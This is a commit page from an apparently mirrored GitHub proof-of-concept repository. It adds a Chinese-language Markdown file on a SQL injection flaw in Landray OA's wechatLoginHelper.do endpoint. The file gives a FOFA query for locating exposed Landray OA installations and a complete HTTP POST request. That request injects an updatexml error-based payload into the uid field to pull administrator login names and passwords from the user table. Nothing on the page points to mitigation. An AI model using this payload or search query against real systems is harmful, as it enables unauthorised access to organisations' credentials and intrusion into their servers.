crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-18 04:04:51 +08:00
Code Issues Packages Projects Releases Wiki Activity

Create 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-02-28 19:23:25 +08:00 committed by GitHub
parent db0c7ef873
commit fc6c05d888
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md Normal file
View File

@ -0,0 +1,19 @@
## 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞
## fofa
```
app="Landray-OA系统"
```
## poc
```
POST /third/wechat/wechatLoginHelper.do HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.850.132 Safari/537.36
Content-Length: 254
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
method=edit&openid=&nickname=&image=&uid=123'and updatexml(1,concat('~',(select concat('~',test.fdLoginName,'~',test.fdPassword,'~') from com.landray.kmss.sys.organization.model.SysOrgPerson test where test.fdLoginName like '%25admin12%25'),'~'),1)=1-- '
```